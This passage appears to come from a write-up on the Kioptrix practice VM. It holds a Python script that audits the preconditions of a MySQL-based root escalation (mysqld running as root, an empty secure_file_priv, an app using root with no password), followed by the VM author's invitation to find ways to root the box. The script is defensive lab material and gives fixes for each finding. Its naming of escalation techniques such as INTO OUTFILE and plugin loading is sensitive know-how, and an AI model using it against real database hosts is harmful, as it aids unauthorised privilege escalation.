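    """Parse the mysql client's ASCII table into {name: value}. An empty cell,
    which is what an unset secure_file_priv looks like, becomes ''."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"\|\s*(\w+)\s*\|\s*(.*?)\s*\|$", line)
        if m and m.group(1) != "Variable_name":
            values[m.group(1)] = m.group(2)
    return values


def audit(ps_text, vars_text, app_db_user, app_db_password):
    """One finding per precondition of the root-via-MySQL chain described above."""
    findings = []
    for p in parse_ps(ps_text):
        if "mysql" in p["command"] and p["user"] == "root":
            findings.append(
                "mysqld (pid %d) runs as root, so anything the server writes "
                "(SELECT ... INTO OUTFILE, plugin libraries) is root-owned; run it "
                "as a dedicated unprivileged user." % p["pid"])
    if parse_show_variables(vars_text).get("secure_file_priv") == "":
        findings.append(
            "secure_file_priv is empty, so file import/export is unrestricted; "
            "point it at a dedicated directory.")
    if app_db_user == "root" and app_db_password == "":
        findings.append(
            "the web application connects as MySQL root with an empty password; "
            "use a least-privilege account with a real password.")
    return findings


if __name__ == "__main__":
    # checklogin.php: $username="root"; $password="";
    for f in audit(PS_AUX, SECURE_FILE_PRIV, "root", ""):
        print("[!]", f)
```

With the page's values the audit reports all three conditions; change the application account to a non-root user with a password and the third finding disappears while the other two remain, which is the point: the database-side fixes (unprivileged mysqld, a real `secure_file_priv`) protect the host even when the application's credentials are weak, and the application-side fix limits the damage of the SQL injection even when the server is misconfigured.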
There is more than one way to get root on this system. Try and find them. I've only tested two (2) methods, but it doesn't mean there aren't more. As always there's an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on: www.kioptrix.com